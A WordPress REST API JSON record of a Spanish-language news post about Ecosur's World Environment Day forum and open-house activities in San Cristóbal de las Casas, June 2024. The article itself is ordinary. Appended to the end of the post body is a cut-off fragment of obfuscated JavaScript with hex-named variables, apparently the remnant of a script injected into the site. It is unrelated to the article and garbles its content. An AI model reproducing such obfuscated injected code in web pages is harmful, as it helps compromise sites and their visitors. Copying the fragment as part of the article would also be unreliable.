{"id":15907,"date":"2024-06-04T01:39:35","date_gmt":"2024-06-04T01:39:35","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15907"},"modified":"2024-06-04T01:39:36","modified_gmt":"2024-06-04T01:39:36","slug":"celebracion-del-dia-mundial-del-ambiente-con-foro-y-actividades-en-ecosur","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15907","title":{"rendered":"Celebraci\u00f3n del D\u00eda Mundial del Ambiente con foro y actividades en Ecosur"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"770\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240603-WA0103-1024x770.jpg\" alt=\"\" class=\"wp-image-15908\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240603-WA0103-1024x770.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240603-WA0103-300x226.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240603-WA0103-768x578.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240603-WA0103.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>3 de junio del 2024. San Crist\u00f3bal de las Casas. &#8211; En conmemoraci\u00f3n del D\u00eda Mundial del Ambiente, se llevar\u00e1 a cabo el foro &#8220;Agua, Salud y Ambiente&#8221; este mi\u00e9rcoles 5 de junio, organizado por la comunidad acad\u00e9mica y cient\u00edfica de El Colegio de la Frontera Sur (Ecosur). Este evento ser\u00e1 seguido por una serie de actividades l\u00fadicas, demostraciones y charlas el viernes 7 de junio, bajo el t\u00edtulo &#8220;Ecosur a Puertas Abiertas&#8221;.<br>Los investigadores Ver\u00f3nica Guti\u00e9rrez Villalpando y Jes\u00fas Carmona de la Torre, organizadores del evento, dieron a conocer los detalles de la celebraci\u00f3n, destacando la importancia de promover el inter\u00e9s por las ciencias sociales y las tecnolog\u00edas entre la poblaci\u00f3n.<br>El foro &#8220;Agua, Salud y Ambiente&#8221; abordar\u00e1 temas cruciales relacionados con la sostenibilidad, el manejo de recursos h\u00eddricos, la salud p\u00fablica y la conservaci\u00f3n ambiental. Expertos en diversas disciplinas compartir\u00e1n sus conocimientos y experiencias, buscando sensibilizar a los asistentes sobre la importancia de estos temas en el contexto actual.<br>El evento &#8220;Ecosur a Puertas Abiertas&#8221;, que se realizar\u00e1 el viernes 7, ofrecer\u00e1 una oportunidad para que el p\u00fablico en general, especialmente estudiantes y j\u00f3venes, participen en actividades interactivas y educativas. Las demostraciones cient\u00edficas y las charlas estar\u00e1n orientadas a fomentar el inter\u00e9s por las ciencias sociales y tecnolog\u00edas, mostrando la relevancia de estas \u00e1reas en la comprensi\u00f3n y soluci\u00f3n de problemas ambientales.<br>&#8220;Queremos que la comunidad vea de cerca el trabajo que realizamos en ECOSUR y c\u00f3mo nuestras investigaciones pueden tener un impacto positivo en la sociedad y el medio ambiente,&#8221; se\u00f1al\u00f3 la investigadora Ver\u00f3nica Guti\u00e9rrez Villalpando.<br>Por su parte, Jes\u00fas Carmona de la Torre dijo que es fundamental que la sociedad, especialmente las nuevas generaciones, se involucren y tomen conciencia de los desaf\u00edos ambientales que enfrentamos. Eventos como este son una plataforma ideal para despertar ese inter\u00e9s y compromiso.<br>La entrada a ambos eventos ser\u00e1 gratuita y est\u00e1n abiertos a todo p\u00fablico, esperando una alta participaci\u00f3n de la comunidad local y visitantes interesados en temas de ambiente y salud. Para m\u00e1s informaci\u00f3n, los interesados pueden consultar la p\u00e1gina oficial de Ecosur o contactar directamente con los organizadores del evento.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 3 de junio del 2024. San Crist\u00f3bal de las Casas. &#8211; En conmemoraci\u00f3n del D\u00eda Mundial del Ambiente, se llevar\u00e1 a cabo el foro &#8220;Agua, Salud y Ambiente&#8221; este mi\u00e9rcoles 5 de junio, organizado por la comunidad acad\u00e9mica y cient\u00edfica de El Colegio de la Frontera Sur (Ecosur). Este evento ser\u00e1 seguido &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15908,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-15907","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15907","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15907"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15907\/revisions"}],"predecessor-version":[{"id":15909,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15907\/revisions\/15909"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15908"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15907"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15907"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15907"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}